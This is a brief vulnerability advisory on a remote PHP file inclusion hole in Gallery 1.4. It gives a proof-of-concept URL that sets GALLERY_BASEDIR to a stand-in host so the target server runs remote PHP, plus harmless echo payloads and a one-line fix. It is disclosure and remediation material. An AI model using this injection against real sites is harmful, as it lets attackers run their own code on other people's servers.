Gallery 1.4 including file vulnerability

-Background Information-
Gallery is a Web-based software product that lets you manage photos on any Web site that offers PHP support. With Gallery you can easily create and maintain albums of photos via an intuitive interface. Photo management includes automatic thumbnail creation, image resizing, rotation, ordering, captioning, searching, and more. Albums can have read, write, and caption permissions per individual authenticated user for an additional level of privacy. Gallery is installed on maybe 20000 Locations.

-Proof of concept-
It is possible to include any php file from a remote host, and execute it on the target's server.
This works:
http://victim/path_to_gallery/setup/index.php?GALLERY_BASEDIR=http://tester/
If the file "http://tester/util.php" exists, it will be included. This file could look like this if PHP isn't supported on the "tester"-host:

<?php echo "Vulnerable"; ?>

or like this, if PHP is supported on the "tester"-host:

<?php
echo "<?php die(\"Vulnerable\"); ?>";
?>

-Solution-
Change the following Lines in the index.php files in the setup folder:

if (!isset($GALLERY_BASEDIR)) {
  $GALLERY_BASEDIR = '../';
}

to this:

  $GALLERY_BASEDIR = '../';

-Related URLs-
http://gallery.sourceforge.net/
https://sourceforge.net/projects/gallery/

Peter Stöckli
RQ Labs
Rootquest
Switzerland